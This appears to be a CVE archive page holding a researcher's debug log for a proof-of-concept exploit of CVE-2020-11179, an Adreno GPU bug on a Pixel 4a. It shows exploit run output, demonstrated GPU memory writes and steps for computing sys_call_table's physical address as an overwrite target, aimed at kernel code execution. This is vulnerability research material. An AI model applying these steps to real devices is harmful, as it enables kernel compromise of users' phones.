4837 Total CVEs
26 Years
GitHub
Home / 2020 / CVE-2020-11179
README.md
Rendering markdown...
POC / debug.txt TXT
⬇ Raw GitHub ✕ Close 
#################################################################
# initial conversion P0 C++ poc
# test device: pixel 4a 
# android 10 on build QD4A.2000317.027
# vuln patched in dec 2020, CVE-2020-11179
#################################################################
# intial output from adb shell as user shell 

sunfish:/data/local/tmp $ ./adrenaline                                                                                                     
starting adrenaline_rptr_child
rptr base is 0xfc0df000
starting adrenaline
starting adrenaline_parent
starting adrenaline_child

# from run.sh
starting adrenaline_rptr_child
rptr base is 0xfc526000
starting adrenaline
starting adrenaline_parent
rptr base is 0xfc526000
starting adrenaline
starting adrenaline_child

#################################################################
# output with hexdump of buffers

sunfish:/data/local/tmp # ./adrenaline                                                                                                     
starting adrenaline_rptr_child
00000000  20 30 40 fc 00 00 00 00 00 00 00 00 00 00 00 00  | 0@.............|
rptr base is 0xfc403000
starting adrenaline
starting adrenaline_parent
starting adrenaline_child
00000000  41 41 41 41 00 00 00 00 00 00 00 00 00 00 00 00  |AAAA............|
00000000  41 41 41 41 42 42 42 42 00 00 00 00 00 00 00 00  |AAAABBBB........|

#################################################################
# after running once, rptr is out of mapping range, not sure why? 
# that 70e5 addr is constant on 2nd run

adrenaline_rptr: 0x70e50000 is out of global mapping range
starting adrenaline_rptr_child
################################################################
# after adding ability to pass rptr as arg
# no out of mapping error
# but 2nd time rptr leak errrors out still, strange behavior
# but proof you can cause multiple gpu writes 
# 

59|sunfish:/data/local/tmp # ./adrenaline                                                                                                  
Usage: ./adrenaline <rptr>
No arg will run leak_rptr
starting adrenaline_rptr_child
00000000  01 00 e5 70 00 00 00 00 00 00 00 00 00 00 00 00  |...p............|
adrenaline_rptr: 0x70e50000 is out of global mapping range
59|sunfish:/data/local/tmp # ./adrenaline 0xfc403000                                                                                       
rptr is passed as 0xfc403000
rptr base is 0xfc403000
starting adrenaline
starting adrenaline_parent
starting adrenaline_child
00000000  41 41 41 41 00 00 00 00 00 00 00 00 00 00 00 00  |AAAA............|
00000000  41 41 41 41 42 42 42 42 00 00 00 00 00 00 00 00  |AAAABBBB........|
sunfish:/data/local/tmp # 
#############################################################################

# poc note to calculate target addr to overwrite

* the target physical page (0x821D9000) corresponds to sys_call_table, which is at
* a fixed physical address that you can calculate by taking the base of "Kernel Code"
* from /proc/iomem and then adding (sys_call_table - _text) from /proc/kallsyms */

#############################################################################
# from phone 
# note that, 0x80080000 is a very standard kernel load addr
sunfish:/data/local/tmp # cat /proc/iomem | grep Kernel                                                                                    
  80080000-8239ffff : Kernel code
  82990000-83138fff : Kernel data

sunfish:/data/local/tmp # cat /proc/kallsyms | head                                                                                        
ffffff9139080000 t _head
ffffff9139080000 T _text
ffffff9139081000 t do_undefinstr.cfi
ffffff9139081000 T _stext

sunfish:/data/local/tmp # cat /proc/kallsyms | grep sys_call_table                                                                         
ffffff913b1a5000 r sys_call_table
ffffff913b1a9000 r compat_sys_call_table

# from kallsyms.txt
$ cat pixel4a_kallsyms.txt | grep _text | head
ffffff8008080000 T _text
ffffff8008081000 T __exception_text_start
ffffff8008082074 T __exception_text_end

$ cat pixel4a_kallsyms.txt | grep sys_call_table | head
ffffff800a1a5000 r sys_call_table
ffffff800a1a9000 r compat_sys_call_table

# calculate phys addr:
$ python
Python 3.8.10 (default, Sep 11 2024, 16:02:53) 

# addr from phone, you can see aslr was applied 
>>> hex(0x80080000+(0xffffff913b1a5000-0xffffff9139080000))
'0x821a5000'

# addr via boot.img kallsyms 
# note the addrs are the same
>>> hex(0x80080000+(0xffffff800a1a5000-0xffffff8008080000))
'0x821a5000'
#
#################################################################
# without root
# you would need an arb read or leak
# that showed you 

1)
cat /proc/iomem | grep Kernel                                                                                    
  80080000-8239ffff : Kernel code

2) some way to derandomize kallsyms
- that would give you _text and sys_call_table 
- via offset and the kaslr slide

#################################################################
# TODO:
# work on context switch and race condition 
# to achieve kernel code exec

#################################################################